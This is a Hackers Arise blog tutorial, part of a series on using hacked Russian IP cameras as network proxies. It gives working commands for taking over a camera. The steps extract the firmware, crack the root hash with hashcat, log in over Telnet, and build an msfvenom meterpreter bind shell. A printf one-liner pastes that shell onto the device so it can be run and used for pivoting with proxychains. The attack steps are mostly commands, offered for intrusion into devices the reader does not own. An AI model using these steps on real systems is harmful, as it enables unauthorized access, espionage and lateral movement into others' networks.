Welcome back, cyberwarriors. We’re continuing the series on camera hacking. This time we’re going into reverse engineering to take over devices that can’t be accessed with basic attacks. As you’ve seen, SSH brute-forcing or logging into a web panel doesn’t always work. That’s when firmware reverse engineering comes in. Case 3: Reverse Engineering Let’s say […]
The post Network Espionage – Using Russian Cameras as Proxies, Part 2 first appeared on Hackers Arise.
Welcome back, cyberwarriors. We’re continuing the series on camera hacking. This time we’re going into reverse engineering to take over devices that can’t be accessed with basic attacks. As you’ve seen, SSH brute-forcing or logging into a web panel doesn’t always work. That’s when firmware reverse engineering comes in.
Case 3: Reverse Engineering
Let’s say you find a camera with no SSH option in the interface, but Telnet is open. That’s a common case.
In this case, we will need to find and download the camera’s firmware. There are different sites hosting firmware, but if you prefer, you can download it directly from the manufacturer. Keep in mind that different manufacturers use different file extensions for their firmware. For this camera we will need the .rootfs file.
Once you have it, install 7zip to extract the contents:
kali > sudo apt install p7zip-full
kali > 7z x firmware.rootfs
After unpacking, you’ll see standard Linux directories like /etc, /bin, and /home.
Head into /etc to look for hashed passwords. This is where most devices store their login data.
Once you find the hash, save it to a file. Use hashcat with a common wordlist like rockyou.txt to crack it:
kali > sudo hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt
These devices often use weak default passwords. If you come across a no-name Chinese-made camera, you might try the password displayed above, as it’s commonly used by the Chinese manufacturers.
After cracking the hash, try logging in using Telnet:
kali > telnet
Use root as the username and the cracked password when prompted. Once you’re in, you’ve got a shell, but Telnet doesn’t support SSH-style dynamic tunneling. To make use of the access, you’ll want a bind shell running on the camera. If tools like curl or ncat aren’t available on the device, you’ll need to copy your payload in manually.
Start by generating your shell:
kali > msfvenom -p linux/armle/meterpreter/bind_tcp -f elf -o bind
Next use this one-liner to convert it into a scriptable format:
kali > cat bind | od -An -t o1 -v | tr ‘ ‘ ‘/’ | while read line; do echo “printf ‘$line’ >> out.bin” | tr ‘/’ ‘\\’; done Now copy the script output and paste it line-by-line on the camera to recreate the payload. Once it’s on the device, give it execution permissions and run it:
target > chmod +x out.bin
target > ./out.bin
This will run your bind shell. Go back to your Kali machine, set up a multi/handler in Metasploit with the same payload and port used, then connect.
Once you’ve got a session, use proxychains with a SOCKS proxy like in Part 1 to move inside the network.
Conclusion
Some targets require more work than just logging in. Basic reverse engineering helps you break into devices that can’t be brute-forced or easily exploited. By extracting and analyzing firmware, cracking hashes, and building payloads manually, you can get control even without common tools or features like SSH. Once inside, cameras make a good pivot point. In the next part, we’ll get into firmware modification for persistence and backdoor deployment. See you there.
The post Network Espionage – Using Russian Cameras as Proxies, Part 2 first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxies-part-2/